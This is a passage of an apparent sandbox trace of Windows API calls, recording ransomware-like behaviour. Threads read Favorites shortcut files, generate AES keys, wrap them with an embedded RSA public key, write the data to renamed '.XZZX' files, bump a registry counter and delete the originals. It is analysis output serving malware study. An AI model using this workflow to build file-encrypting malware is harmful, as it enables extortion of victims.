dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0046.516] WriteFile (in: hFile=0x56c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x1a, lpOverlapped=0x0) returned 1 [0046.516] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa4 [0046.516] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.516] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa9 [0046.516] SetErrorMode (uMode=0x1) returned 0x1 [0046.516] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.516] OutputDebugStringW (lpOutputString="end") [0046.517] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.517] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0046.517] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d60e8) returned 1 [0046.518] CryptImportPublicKeyInfo (in: hCryptProv=0x42d60e8, dwCertEncodingType=0x1, pInfo=0x3e40740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40778*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27e38) returned 1 [0046.518] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.518] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.518] CryptEncrypt (in: hKey=0x3e27e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0046.518] CryptEncrypt (in: hKey=0x3e27e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e41d48*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e41d48*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0046.519] WriteFile (in: hFile=0x56c, lpBuffer=0x3e41d48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e41d48*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0046.519] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.519] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.519] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0046.520] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.520] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x57c) returned 0x0 [0046.520] RegQueryValueExW (in: hKey=0x57c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x46, lpcbData=0x417dfdc*=0x4) returned 0x0 [0046.520] RegCloseKey (hKey=0x57c) returned 0x0 [0046.520] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x57c) returned 0x0 [0046.520] RegSetValueExW (in: hKey=0x57c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x47, cbData=0x4 | out: lpData=0x417dfec*=0x47) returned 0x0 [0046.520] RegCloseKey (hKey=0x57c) returned 0x0 [0046.520] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.520] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.521] CloseHandle (hObject=0x56c) returned 1 [0046.521] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.522] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url")) returned 1 [0046.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url")) returned 0 Thread: id = 166 os_tid = 0x884 [0046.592] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.592] lstrcpyW (in: lpString1=0x417f460, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0046.592] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.592] SetErrorMode (uMode=0x1) returned 0x1 [0046.593] lstrcpyW (in: lpString1=0x417f860, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0046.593] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x78bd0392, Data2=0x7d83, Data3=0x481f, Data4=([0]=0x84, [1]=0x4c, [2]=0xc, [3]=0x12, [4]=0x2b, [5]=0xaf, [6]=0x28, [7]=0xf7))) returned 0x0 [0046.593] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0046.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.593] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\13771DB6235C0ADD78BD03922773EF25.XZZX") returned 94 [0046.593] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="XZZX") returned 0x0 [0046.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x20) returned 1 [0046.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0046.594] ReadFile (in: hFile=0x578, lpBuffer=0x34e068, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0046.594] CloseHandle (hObject=0x578) returned 1 [0046.594] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0046.594] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0046.595] SetErrorMode (uMode=0x1) returned 0x1 [0046.595] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.595] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e41dd0) returned 1 [0046.601] CryptGenKey (in: hProv=0x3e41dd0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0046.743] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.743] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.743] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.744] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.744] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0046.744] CryptReleaseContext (hProv=0x3e41dd0, dwFlags=0x0) returned 1 [0046.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\13771DB6235C0ADD78BD03922773EF25.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\13771db6235c0add78bd03922773ef25.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0046.744] WriteFile (in: hFile=0x578, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0046.745] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0046.745] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.745] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0046.745] WriteFile (in: hFile=0x578, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0046.745] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0046.745] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.745] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb9 [0046.745] SetErrorMode (uMode=0x1) returned 0x1 [0046.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.745] OutputDebugStringW (lpOutputString="end") [0046.746] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.746] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0046.746] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e41dd0) returned 1 [0046.746] CryptImportPublicKeyInfo (in: hCryptProv=0x3e41dd0, dwCertEncodingType=0x1, pInfo=0x3e40810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40848*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27e78) returned 1 [0046.746] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.747] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.747] CryptEncrypt (in: hKey=0x3e27e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0046.747] CryptEncrypt (in: hKey=0x3e27e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e41e58*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e41e58*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0046.747] WriteFile (in: hFile=0x578, lpBuffer=0x3e41e58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e41e58*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0046.747] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.747] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.747] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0046.748] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.748] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x584) returned 0x0 [0046.748] RegQueryValueExW (in: hKey=0x584, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x47, lpcbData=0x417dfdc*=0x4) returned 0x0 [0046.748] RegCloseKey (hKey=0x584) returned 0x0 [0046.748] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x584) returned 0x0 [0046.749] RegSetValueExW (in: hKey=0x584, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x48, cbData=0x4 | out: lpData=0x417dfec*=0x48) returned 0x0 [0046.749] RegCloseKey (hKey=0x584) returned 0x0 [0046.749] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.749] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.749] CloseHandle (hObject=0x578) returned 1 [0046.750] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.750] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.750] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url")) returned 1 [0046.751] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url")) returned 0 Thread: id = 167 os_tid = 0x9f8 [0046.754] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.754] lstrcpyW (in: lpString1=0x42cf460, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0046.754] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.754] SetErrorMode (uMode=0x1) returned 0x1 [0046.754] lstrcpyW (in: lpString1=0x42cf860, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0046.754] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xdd5c15d9, Data2=0x385d, Data3=0x4b2b, Data4=([0]=0x91, [1]=0xfd, [2]=0xe7, [3]=0x8e, [4]=0xb0, [5]=0x6e, [6]=0xef, [7]=0x9e))) returned 0x0 [0046.754] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0046.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.754] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned 94 [0046.754] StrStrW (lpFirst="MSN Money.url", lpSrch="XZZX") returned 0x0 [0046.754] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x20) returned 1 [0046.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0046.755] ReadFile (in: hFile=0x56c, lpBuffer=0x34e188, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesRead=0x42ce418*=0x85, lpOverlapped=0x0) returned 1 [0046.756] CloseHandle (hObject=0x56c) returned 1 [0046.756] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0046.757] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0046.757] SetErrorMode (uMode=0x1) returned 0x1 [0046.757] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.757] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e41ee0) returned 1 [0046.760] CryptGenKey (in: hProv=0x3e41ee0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0046.885] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0046.885] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0046.885] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.886] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.886] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0046.886] CryptReleaseContext (hProv=0x3e41ee0, dwFlags=0x0) returned 1 [0046.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\8f3b67d5108cb69fdd5c15d914b99ae7.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0046.886] WriteFile (in: hFile=0x56c, lpBuffer=0x34e188*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesWritten=0x42ce438*=0x85, lpOverlapped=0x0) returned 1 [0046.886] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0046.886] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.886] SetFilePointer (in: hFile=0x56c, 